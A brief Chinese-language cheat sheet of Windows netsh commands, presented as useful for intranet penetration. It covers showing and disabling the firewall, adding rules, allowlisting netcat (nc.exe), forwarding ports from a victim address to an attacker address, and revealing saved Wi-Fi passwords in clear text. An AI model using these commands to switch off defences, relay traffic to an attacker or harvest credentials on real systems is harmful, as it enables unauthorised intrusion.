netsh
netsh为windows自带命令,在内网渗透中也能发挥一定的作用
查看防火墙状态
netsh firewall show state
netsh advfirewall show allprofiles
开启防火墙
netsh firewall set opmode enable
netsh firewall set allprofiles state on
关闭防火墙
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
设置防火墙日志路径
netsh advfirewall set currentprofile logging filename "C:\Windows\firewall.log"
添加防火墙规则
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389
### 删除防火墙规则
netsh advfirewall firewall delete rule name="rule_name"
添加端口规则
netsh firewall portopening tcp 1234 rule_name
删除端口规则
netsh firewall delete portopening tcp 1234
添加程序规则
netsh firewall add allowedprogram "C:\\nc.exe" "allow nc" enable
删除程序规则
netsh firewall delete allowedprogram "C:\\nc.exe"
添加端口转发
netsh interface portproxy add v4tov4 [listenaddress=victim_ip] listenport=victim_port connectaddress=attack_ip connectport=attack_port
删除端口转发
netsh interface portproxy delete v4tov4 [listenaddress=victim_ip] listenport=victim_port
查看端口转发
netsh interface portproxy show all
netsh interface portproxy show v4tov4
netsh interface portproxy show v4tov6
netsh interface portproxy show v6tov4
netsh interface portproxy show v6tov6
安装IPv6
netsh interface ipv6 install
查看无线网络信息
查看指定WIFI密码
netsh wlan show profiles wifi_name key=clear